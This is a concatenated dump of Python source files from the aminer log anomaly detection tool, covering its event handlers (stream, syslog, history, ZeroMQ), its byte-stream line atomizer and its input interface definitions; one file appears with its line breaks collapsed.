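        # An empty list has no meaningful mean; report 0.0 instead of dividing by zero.
        confidence_mean = confidence_absolut / len(analysis_list) if analysis_list else 0.0
        node[output_field_path[-1]] = {'confidence_absolut': confidence_absolut, 'confidence_mean': confidence_mean}

    def _remember(self, analysis_list):
        """Append analysis_list to the ring buffer used for automatic weighting."""
        self.history_list[self.history_list_index] = analysis_list
        self.history_list_index = (self.history_list_index + 1) % self.auto_weights_history_length

    @staticmethod
    def _source_visible_to(event_source, listener):
        """
        Return event_source, or a copy whose output_event_handlers additionally lists listener.

        copy.copy() is shallow, so appending to the copied reference would extend the detector's own list; the copy gets
        its own list instead.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is None or listener in handlers:
            return event_source
        event_source = copy.copy(event_source)
        event_source.output_event_handlers = list(handlers) + [listener]
        return event_source

    def get_weight(self, value):
        """
        Return the weight of the value parameter.

        Explicitly configured weights win; otherwise DEFAULT_WEIGHT is used, or, with auto_weights, the weight derived from
        how many recent analysis lists contained the value.
        """
        if self.weights is not None and value in self.weights:
            return self.weights[value]
        if not self.auto_weights:
            return self.DEFAULT_WEIGHT
        appearances = sum(value in value_list for value_list in self.history_list)
        return self.AUTO_WEIGHT_SCALE / (self.AUTO_WEIGHT_SCALE + appearances)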
"""
This module defines an event handler that prints data to a stream.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import sys

from aminer.events.EventInterfaces import EventHandlerInterface
from aminer.events.EventData import EventData


class StreamPrinterEventHandler(EventHandlerInterface):
    """
    Event record listener that renders each event with EventData and writes the text to a stream.

    The stream defaults to stdout.
    """

    def __init__(self, analysis_context, stream=sys.stdout):
        """
        Initialize the event handler.

        @param analysis_context the analysis context used to get the component.
        @param stream the output stream of the event handler.
        """
        self.analysis_context = analysis_context
        self.stream = stream

    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event and print it to the stream.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the event_type.
        @param log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is not None and self not in handlers:
            return
        name = self.analysis_context.get_name_by_component(event_source)
        if name in self.analysis_context.suppress_detector_list:
            return
        rendered = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source, self.analysis_context)
        message = f'{rendered.receive_event_string()}\n'
        # Binary-capable streams (e.g. sys.stdout) get the encoded text, others the str as-is.
        if hasattr(self.stream, 'buffer'):
            self.stream.buffer.write(message.encode())
        else:
            self.stream.write(message)
        self.stream.flush()
"""
This module defines an event handler that prints data to a local syslog instance.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import io
import os
import syslog

from aminer.events.EventInterfaces import EventHandlerInterface
from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler


class SyslogWriterEventHandler(EventHandlerInterface):
    """
    Event record listener that forwards events to the local syslog instance.

    CAVEAT: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and
    probably fill up your disks.
    """

    # Python's syslog module mangles very long lines, so every rendered line is emitted in chunks of this many characters.
    MAX_CHUNK_LENGTH = 800

    def __init__(self, analysis_context, instance_name='aminer'):
        """
        Initialize the event handler.

        @param analysis_context the analysis context used to get the component.
        @param instance_name the process name shown in the syslog.
        """
        self.analysis_context = analysis_context
        self.instanceName = instance_name
        ident = f'{self.instanceName}[{os.getpid()}]'
        syslog.openlog(ident, syslog.LOG_INFO, syslog.LOG_DAEMON)
        syslog.syslog(syslog.LOG_INFO, 'Syslog logger initialized')
        # Events are rendered into this buffer by a StreamPrinterEventHandler and then split into syslog messages.
        self.buffer_stream = io.StringIO()
        self.event_writer = StreamPrinterEventHandler(analysis_context, self.buffer_stream)
        self.event_id = 0

    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event and forward it to syslog.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the event_type.
        @param log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is not None and self not in handlers:
            return
        name = self.analysis_context.get_name_by_component(event_source)
        if name in self.analysis_context.suppress_detector_list:
            return
        self.buffer_stream.seek(0)
        self.buffer_stream.truncate(0)
        self.event_writer.receive_event(event_type, event_message, sorted_loglines, event_data, log_atom, event_source)
        rendered = self.buffer_stream.getvalue()
        current_event_id = self.event_id
        self.event_id += 1
        serial = 0
        chunk = self.MAX_CHUNK_LENGTH
        for data_line in rendered.strip().split('\n'):
            while data_line:
                # The first chunk of an event carries only the event id, later chunks also a running serial number.
                prefix = f'[{current_event_id}]' if serial == 0 else f'[{current_event_id}-{serial}]'
                syslog.syslog(syslog.LOG_INFO, f'{prefix} {data_line[:chunk]}')
                data_line = data_line[chunk:]
                serial += 1
"""
This module defines a handler for storing event history.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

from aminer.events.EventInterfaces import EventHandlerInterface
from aminer.util.History import LogarithmicBackoffHistory


class VolatileLogarithmicBackoffEventHistory(EventHandlerInterface, LogarithmicBackoffHistory):
    """
    Volatile filter keeping a history of received events.

    Example usages are analysis by other components or external access via the remote control interface. Each entry holds
    references to the original log_atom and event_source objects, so they stay alive as long as the entry is kept.
    """

    def __init__(self, max_items):
        """
        Initialize the history component.

        @param max_items the maximum number of items in the event history.
        """
        LogarithmicBackoffHistory.__init__(self, max_items)
        self.event_id = 0

    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event and store all related data as a tuple in the history log.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the event_type.
        @param log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        @return always True.
        """
        record = (self.event_id, event_type, event_message, sorted_loglines, event_data, log_atom, event_source)
        self.add_object(record)
        self.event_id += 1
        return True
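"""
This module defines an event handler that forwards anomalies to ZeroMQ.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import sys
import logging

from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.events.EventInterfaces import EventHandlerInterface
import zmq


class ZmqEventHandler(EventHandlerInterface):
    """This class implements an event record listener, that will forward Json-objects to a ZeroMQ queue."""

    def __init__(self, analysis_context, topic=None, url="ipc:///tmp/aminer"):
        """
        Initialize the event handler.

        @param analysis_context the analysis context used to get the component.
        @param topic the topic used in the Zero Message Queue.
        @param url the endpoint the PUB socket binds to. The default is an ipc path below the shared /tmp directory, where any local
        user can pre-create or replace the path before aminer binds it; deployments should point this to a directory writable only
        by the aminer user.
        """
        self.analysis_context = analysis_context
        self.url = url
        self.topic = topic
        self.producer = None
        self.context = None
        self.zmq_imported = False
        logging.getLogger(DEBUG_LOG_NAME).info("ZmqEventHandler initialized")

    def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source):
        """
        Receive information about a detected event in json format and publish it on the socket.

        @param _event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages.
        @param _event_message the first output line of the event.
        @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data the serialized event (str or bytes); anything else is rejected.
        @param _log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        @return True when the event was skipped or sent, False when the socket could not be set up or the send failed.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is not None and self not in handlers:
            return True
        component_name = self.analysis_context.get_name_by_component(event_source)
        if component_name in self.analysis_context.suppress_detector_list:
            return True
        if not self._ensure_socket():
            return False
        if not isinstance(event_data, (str, bytes)):
            msg = 'ZmqEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first.'
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            print('WARNING: ' + msg, file=sys.stderr)
            return False
        try:
            if self.topic:
                self.producer.send_string(self.topic, flags=zmq.SNDMORE)
            # please note that if the JsonConvertHandler was used(json: true) then it is possible to use the socket.recv_json()
            # for the consumer. recv_json() will decode the json-string
            if isinstance(event_data, bytes):
                # send_string() accepts only str; raw bytes go out as a plain frame.
                self.producer.send(event_data)
            else:
                self.producer.send_string(event_data)
        except zmq.ZMQError as err:
            self._report_error(err)
            self._close_socket()
            return False
        return True

    def _ensure_socket(self):
        """
        Create the PUB socket and bind it to the configured url on first use (or after a failure).

        @return True when a bound socket is available, False when setup failed.
        """
        if self.zmq_imported:
            return True
        try:
            if self.context is None:
                self.context = zmq.Context()  # skipcq: PYL-E0110
            self.producer = self.context.socket(zmq.PUB)
            self.producer.bind(self.url)
        except zmq.ZMQError as err:
            # bind() fails e.g. when the endpoint is already in use or the ipc path is not writable. zmq is imported at module
            # level, so an ImportError cannot arise here.
            self._report_error(err)
            self._close_socket()
            return False
        logging.getLogger(DEBUG_LOG_NAME).info("Created socket on %s", self.url)
        self.zmq_imported = True
        return True

    def _close_socket(self):
        """Release the socket and force re-creation on the next event."""
        if self.producer is not None:
            # The socket was bound, not connected, so close() is the matching teardown (disconnect() needs an endpoint argument).
            self.producer.close()
        self.producer = None
        self.zmq_imported = False

    @staticmethod
    def _report_error(err):
        """Log a ZeroMQ error to the debug log and stderr."""
        msg = str(err)
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        print("Error: " + msg, file=sys.stderr)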
""" import logging import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.input.LogAtom import LogAtom from aminer.input.InputInterfaces import StreamAtomizer from aminer.input.JsonStateMachine import json_machine from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch breakout = False data = None line = None def found_json(_data): """Set the breakout variable if the JsonStateMachine finished.""" global breakout # skipcq: PYL-W0603 breakout = True global data # skipcq: PYL-W0603 data = _data class ByteStreamLineAtomizer(StreamAtomizer): """ This atomizer consumes binary data from a stream to break it into lines, removing the line separator at the end. With a parsing model, it will also perform line parsing. Failures in atomizing or parsing will cause events to be generated and sent to event handler. Data will be consumed only when there was no downstream handler registered (the data will be discarded in that case) or when at least one downstream consumed the data. """ COUNTER = 0 def __init__(self, parsing_model, atom_handler_list, event_handler_list, max_line_length, default_timestamp_path_list, eol_sep=b'\n', json_format=False): """ Create the atomizer. @param event_handler_list when not None, send events to those handlers. The list might be empty at invocation and populated later on. @param max_line_length the maximal line length including the final line separator. """ self.parsing_model = parsing_model self.atom_handler_list = atom_handler_list self.event_handler_list = event_handler_list self.max_line_length = max_line_length self.default_timestamp_path_list = default_timestamp_path_list if not isinstance(eol_sep, bytes): msg = f'{self.__class__.__name__} eol_sep parameter must be of type bytes!' 
print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) sys.exit(-1) self.eol_sep = eol_sep self.json_format = json_format self.in_overlong_line_flag = False # If consuming of data was already attempted but the downstream handlers refused to handle it, keep the data and the parsed # object to avoid expensive duplicate parsing operation. The data does not include the line separators any more. self.last_unconsumed_log_atom = None def consume_data(self, stream_data, end_of_stream_flag=False): """ Consume data from the underlying stream for atomizing. @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was consumed at the moment but data might be consumed later on. """ # Loop until as much streamData as possible was processed and then return a result. The correct processing of endOfStreamFlag # is tricky: by default, even when all data was processed, do one more iteration to handle also the flag. consumed_length = 0 while True: if self.last_unconsumed_log_atom is not None: # Keep length before dispatching: dispatch will reset the field. data_length = len(self.last_unconsumed_log_atom.raw_data) if self.dispatch_atom(self.last_unconsumed_log_atom): consumed_length += data_length + len(self.eol_sep) continue # Nothing consumed, tell upstream to wait if appropriate. 
if consumed_length == 0: consumed_length = -1 break line_end = None global breakout # skipcq: PYL-W0603 breakout = False global data # skipcq: PYL-W0603 data = None valid_json = False if self.json_format: state = json_machine(found_json) i = 0 for i, char in enumerate(stream_data[consumed_length:]): state = state(char) if breakout or state is None or i > self.max_line_length: break # check if the json is still valid, but the stream_data is at the end if not breakout and state is not None and i + consumed_length == len(stream_data) - 1 and not end_of_stream_flag: return consumed_length if 0 < i <= self.max_line_length and b'{' in stream_data[consumed_length:consumed_length+i+1] and data is not None: line_end = consumed_length + i + 1 valid_json = True elif i > self.max_line_length: self.in_overlong_line_flag = True if line_end is None: line_end = stream_data.find(self.eol_sep, consumed_length) if self.in_overlong_line_flag: if line_end < 0: consumed_length = len(stream_data) if end_of_stream_flag: self.dispatch_event('Overlong line terminated by end of stream', stream_data) self.in_overlong_line_flag = False break consumed_length = line_end + len(self.eol_sep) self.in_overlong_line_flag = False continue # This is the valid start of a normal/incomplete/overlong line. if line_end < 0: tail_length = len(stream_data) - consumed_length if tail_length > self.max_line_length: self.dispatch_event('Start of overlong line detected', stream_data[consumed_length:]) self.in_overlong_line_flag = True consumed_length = len(stream_data) # Stay in loop to handle also endOfStreamFlag! continue if end_of_stream_flag and (tail_length != 0): self.dispatch_event('Incomplete last line', stream_data[consumed_length:]) consumed_length = len(stream_data) break # This is at least a complete/overlong line. 
line_length = line_end + len(self.eol_sep) - consumed_length if line_length > self.max_line_length and not valid_json: self.dispatch_event('Overlong line detected', stream_data[consumed_length:line_end]) consumed_length = line_end + len(self.eol_sep) continue # This is a normal line. line_data = stream_data[consumed_length:line_end] log_atom = LogAtom(line_data, None, None, self) if self.parsing_model is not None: match_context = MatchContext(line_data) match_element = self.parsing_model.get_match_element('', match_context) if (match_element is not None) and not match_context.match_data: log_atom.parser_match = ParserMatch(match_element) for default_timestamp_path in self.default_timestamp_path_list: ts_match = log_atom.parser_match.get_match_dictionary().get(default_timestamp_path, None) if ts_match is not None: log_atom.set_timestamp(ts_match.match_object) break if self.dispatch_atom(log_atom): consumed_length = line_end + len(self.eol_sep) - ( valid_json and stream_data[line_end:line_end+len(self.eol_sep)] != self.eol_sep) continue if consumed_length == 0: # Downstream did not want the data, so tell upstream to block for a while. consumed_length = -1 break return consumed_length def dispatch_atom(self, log_atom): """Dispatch the data using the appropriate handlers. 
Also clean or set lastUnconsumed fields depending on outcome of dispatching."""
        # Class-level counter shared by all instances; only used for the periodic progress log line.
        type(self).COUNTER = type(self).COUNTER + 1
        if self.COUNTER % 1000 == 0 and self.COUNTER != 0:
            logging.getLogger(DEBUG_LOG_NAME).info("%d log atoms were processed totally.", self.COUNTER)
        was_consumed_flag = False
        if not self.atom_handler_list:
            # No handlers configured: the atom counts as consumed so upstream is never blocked.
            was_consumed_flag = True
        else:
            for handler in self.atom_handler_list:
                if handler.receive_atom(log_atom):
                    was_consumed_flag = True
        if was_consumed_flag:
            self.last_unconsumed_log_atom = None
        else:
            self.last_unconsumed_log_atom = log_atom
        return was_consumed_flag

    def dispatch_event(self, message, line_data):
        """
        Forward one event to every registered event handler.

        The event is attributed to this atomizer via the component name 'Input.<ClassName>'; line_data is passed as the
        single-element log line list. Nothing happens when no event handler list is configured.
        @param message the human readable event message.
        @param line_data the raw line (or line fragment) the event refers to.
        """
        handlers = self.event_handler_list
        if handlers is None:
            return
        component_name = f'Input.{self.__class__.__name__}'
        for handler in handlers:
            handler.receive_event(component_name, message, [line_data], None, None, self)
InputInterfaces.py000066400000000000000000000370311437606560100337500ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input
"""
This file contains interface definition useful implemented by classes in this directory and for use from code outside this directory.

All classes are defined in separate files, only the namespace references are added here to simplify the code.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import abc
import time
import logging
from aminer.AminerConfig import STAT_LOG_NAME, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer import AminerConfig


class AtomizerFactory(metaclass=abc.ABCMeta):
    """
    This is the common interface of all factories to create atomizers for new data sources.

    These atomizers are integrated into the downstream processing pipeline.
    """

    @abc.abstractmethod
    def get_atomizer_for_resource(self, resource_name):
        """
        Get an atomizer for a given resource.

        @param resource_name the name of the resource the atomizer shall be created for.
        @return a StreamAtomizer object
        """


class StreamAtomizer(metaclass=abc.ABCMeta):
    """
    This is the common interface of all binary stream atomizers.

    Atomizers in general should be good detecting and reporting malformed atoms but continue to function by attempting error correction
    or resynchronization with the stream after the bad atom. This type of atomizer also signals a stream source when the stream data
    cannot be handled at the moment to throttle reading of the underlying stream.
    """

    @abc.abstractmethod
    def consume_data(self, stream_data, end_of_stream_flag=False):
        """
        Consume data from the underlying stream for atomizing.

        Data should only be consumed after splitting of an atom. The caller has to keep unconsumed data till the next invocation.
        @param stream_data the data offered to be consumed or zero length data when end_of_stream_flag is True (see below).
        @param end_of_stream_flag this flag is used to indicate, that the stream_data offered is the last from the input stream.
        If the stream_data does not form a complete atom, no rollover is expected or rollover would have honoured the atom boundaries,
        then the StreamAtomizer should treat that as an error. With rollover, consuming of the stream end data will signal the invoker
        to continue with data from next stream. When end of stream was reached but invoker has no stream_data to send, it will invoke
        this method with zero-length data, which has to be consumed with a zero-length reply.
        @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was
        consumed at the moment but data might be consumed later on. The only situation where 0 is not an allowed return value is when
        end_of_stream_flag is set and stream_data not empty.
        """


class AtomHandlerInterface(metaclass=abc.ABCMeta):
    """This is the common interface of all handlers suitable for receiving log atoms."""

    output_event_handlers = None

    def __init__(self, mutable_default_args=None, learn_mode=None, stop_learning_time=None, stop_learning_no_anomaly_time=None,
                 stop_when_handled_flag=None, **kwargs):
        """
        Initialize the parameters of analysis components.

        Every non-None named parameter and every keyword argument is stored as an attribute of the same name on self. Keyword
        argument names are restricted to the allowed_kwargs list below, so a configuration cannot set arbitrary attributes on a
        component. See the classes of the analysis components for parameter descriptions.
        @param mutable_default_args names of attributes that get an empty list/dict/set/tuple (chosen by name suffix) when still None.
        @param learn_mode when False, neither stop_learning_time nor stop_learning_no_anomaly_time may be given.
        @param stop_learning_time seconds from now after which learning stops (int or None).
        @param stop_learning_no_anomaly_time seconds without anomaly after which learning stops (int or None); mutually exclusive
        with stop_learning_time.
        @param stop_when_handled_flag paired with each entry of subhandler_list, if such a list was given.
        @raise ValueError on an unknown keyword argument or an inconsistent learn_mode/stop_learning combination.
        @raise TypeError when a stop_learning value is neither int nor None, or subhandler_list holds a non-AtomHandlerInterface.
        """
        allowed_kwargs = [
            "mutable_default_args", "aminer_config", "anomaly_event_handlers", "learn_mode", "persistence_id", "id_path_list",
            "stop_learning_time", "stop_learning_no_anomaly_time", "output_logline", "target_path_list", "constraint_list",
            "ignore_list", "allowlist_rules", "subhandler_list", "stop_when_handled_flag", "parsed_atom_handler_lookup_list",
            "default_parsed_atom_handler", "target_path", "parsed_atom_handler_dict", "allow_missing_values_flag",
            "tuple_transformation_function", "prob_thresh", "skip_repetitions", "max_hypotheses", "hypothesis_max_delta_time",
            "generation_probability", "generation_factor", "max_observations", "p0", "alpha", "candidates_size",
            "hypotheses_eval_delta_time", "delta_time_to_discard_hypothesis", "check_rules_flag", "window_size", "scoring_path_list",
            "num_windows", "confidence_factor", "empty_window_warnings", "early_exceeding_anomaly_output", "set_lower_limit",
            "set_upper_limit", "local_maximum_threshold", "seq_len", "allow_missing_id", "timeout", "allowed_id_tuples",
            "min_num_vals", "max_num_vals", "save_values", "track_time_for_tsa", "waiting_time", "num_sections_waiting_time",
            "histogram_definitions", "report_interval", "reset_after_report_flag", "bin_definition", "target_value_list",
            "timestamp_path", "min_bin_elements", "min_bin_time", "debug_mode", "stream", "separator", "missing_value_string",
            "num_log_lines_solidify_matrix", "time_output_threshold", "anomaly_threshold", "default_interval", "realert_interval",
            "combine_values", "min_allowed_time_diff", "target_label_list", "split_reports_flag", "event_type_detector", "num_init",
            "force_period_length", "set_period_length", "alpha_bt", "num_results_bt", "num_min_time_history", "num_max_time_history",
            "num_periods_tsa_ini", "time_period_length", "max_time_diff", "num_reduce_time_list", "min_anomaly_score", "min_variance",
            "parallel_check_count", "record_count_before_event", "use_path_match", "use_value_match", "min_rule_attributes",
            "max_rule_attributes", "ruleset", "exit_on_error_flag", "acf_pause_interval_percentage", "acf_auto_pause_interval",
            "acf_auto_pause_interval_num_min", "build_sum_over_values", "num_division_time_step", "acf_threshold",
            "round_time_interval_threshold", "min_log_lines_per_time_step", "num_update", "disc_div_thres",
            "num_steps_create_new_rules", "num_upd_until_validation", "num_end_learning_phase", "check_cor_thres",
            "check_cor_prob_thres", "check_cor_num_thres", "min_values_cors_thres", "new_vals_alarm_thres", "num_bt",
            "used_homogeneity_test", "alpha_chisquare_test", "max_dist_rule_distr", "used_presel_meth", "intersect_presel_meth",
            "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit", "match_disc_distr_threshold",
            "used_cor_meth", "used_validate_cor_meth", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "used_gof_test",
            "gof_alpha", "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres",
            "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_pause_others", "test_gof_int",
            "num_stop_update", "silence_output_without_confidence", "silence_output_except_indicator", "num_var_type_hist_ref",
            "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update", "num_updates_until_var_reduction",
            "var_reduction_thres", "num_skipped_ind_for_weights", "num_ind_for_weights", "used_multinomial_test", "use_empiric_distr",
            "used_range_test", "range_alpha", "range_threshold", "num_reinit_range", "range_limits_factor", "dw_alpha",
            "save_statistics", "idf", "norm", "add_normal", "check_empty_windows", "unique_path_list"
        ]
        self.log_success = 0
        self.log_total = 0
        self.persistence_id = None  # persistence_id is always needed.
        # Copy the named parameters onto self by slicing locals(). This relies on the interpreter listing the locals in
        # parameter order, which is fragile.
        # NOTE(review): allowed_kwargs is itself a local at this point, so the [1:-1] slice appears to drop allowed_kwargs rather
        # than kwargs, leaving the kwargs dict to be stored as self.kwargs - confirm against the intent stated in the comment.
        for argument, value in list(locals().items())[1:-1]:  # skip self parameter and kwargs
            if value is not None:
                setattr(self, argument, value)
        # Keyword arguments are only accepted from the allowlist above; anything else is a configuration error.
        for argument, value in kwargs.items():  # skip self parameter and kwargs
            if argument not in allowed_kwargs:
                msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            setattr(self, argument, value)
        if learn_mode is False and (stop_learning_time is not None or stop_learning_no_anomaly_time is not None):
            msg = "It is not possible to use the stop_learning_time or stop_learning_no_anomaly_time when the learn_mode is False."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if stop_learning_time is not None and stop_learning_no_anomaly_time is not None:
            msg = "stop_learning_time is mutually exclusive to stop_learning_no_anomaly_time. Only one of these attributes may be used."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(stop_learning_time, (type(None), int)):
            msg = "stop_learning_time has to be of the type int or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if not isinstance(stop_learning_no_anomaly_time, (type(None), int)):
            msg = "stop_learning_no_anomaly_time has to be of the type int or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # Absolute wall-clock deadline for learning; None means learning never stops by time.
        self.stop_learning_timestamp = None
        if stop_learning_time is not None:
            self.stop_learning_timestamp = time.time() + stop_learning_time
        self.stop_learning_no_anomaly_time = stop_learning_no_anomaly_time
        if stop_learning_no_anomaly_time is not None:
            self.stop_learning_timestamp = time.time() + stop_learning_no_anomaly_time
        if hasattr(self, "aminer_config"):
            self.next_persist_time = time.time() + self.aminer_config.config_properties.get(
                KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        # Replace still-unset mutable defaults by fresh empty containers so instances never share one default object.
        if mutable_default_args is not None:
            for argument in mutable_default_args:
                if hasattr(self, argument) and getattr(self, argument) is not None:
                    continue
                if argument.endswith("list"):
                    setattr(self, argument, [])
                elif argument.endswith("dict"):
                    setattr(self, argument, {})
                elif argument.endswith("set"):
                    setattr(self, argument, set())
                elif argument.endswith("tuple"):
                    setattr(self, argument, ())
        if hasattr(self, "subhandler_list"):
            if (not isinstance(self.subhandler_list, list)) or \
                    (not all(isinstance(handler, AtomHandlerInterface) for handler in self.subhandler_list)):
                msg = "Only subclasses of AtomHandlerInterface allowed in subhandler_list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            # Each subhandler entry is rewritten in place to a (handler, stop_when_handled_flag) pair.
            for handler_pos, handler_element in enumerate(self.subhandler_list):
                self.subhandler_list[handler_pos] = (handler_element, stop_when_handled_flag)
        if hasattr(self, "allowed_id_tuples"):
            if self.allowed_id_tuples is None:
                self.allowed_id_tuples = []
            else:
                self.allowed_id_tuples = [tuple(tuple_list) for tuple_list in self.allowed_id_tuples]
        # An out-of-range confidence_factor is clamped to 1 with a warning instead of being rejected.
        if hasattr(self, "confidence_factor") and not 0 <= self.confidence_factor <= 1:
            logging.getLogger(DEBUG_LOG_NAME).warning('confidence_factor must be in the range [0,1]!')
            self.confidence_factor = 1

    @abc.abstractmethod
    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.

        @param log_atom binary raw atom data
        @return True if this handler was really able to handle and process the atom. Depending on this information, the caller
        may decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented
        at each source implementation sending LogAtoms.
        """

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        The success/total counters are reset to zero after every call, so each line covers one reporting interval.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL > 0:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success,
                self.log_total)
        self.log_success = 0
        self.log_total = 0


class LogDataResource(metaclass=abc.ABCMeta):
    """
    This is the superinterface of each logdata resource monitored by aminer.

    The interface is designed in a way, that instances of same subclass can be used both on aminer parent process side for keeping
    track of the resources and forwarding the file descriptors to the child, but also on child side for the same purpose. The only
    difference is, that on child side, the stream reading and read continuation features are used also. After creation on child side,
    this is the sole place for reading and closing the streams. An external process may use the file descriptor only to wait for input
    via select.
    """

    @abc.abstractmethod
    def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None):
        """
        Create a new LogDataResource.

        Object creation must not touch the log_stream_fd or read any data, unless repositioning_data was given. In the latter case,
        the stream has to support seek operation to reread data.
        @param log_resource_name the unique encoded name of this source as byte array.
        @param log_stream_fd the stream for reading the resource or -1 if not yet opened.
        @param default_buffer_size the read size used by fill_buffer().
        @param repositioning_data if not None, attempt to position the stream using the given data.
        """

    @abc.abstractmethod
    def open(self, reopen_flag=False):
        """
        Open the given resource.

        @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one.
        @raise Exception if valid log_stream_fd was already provided, is still open and reopen_flag is False.
        @raise OSError when opening failed with unexpected error.
        @return True if the resource was really opened or False if opening was not yet possible but should be attempted again.
        """

    @abc.abstractmethod
    def get_resource_name(self):
        """Get the name of this log resource."""

    @abc.abstractmethod
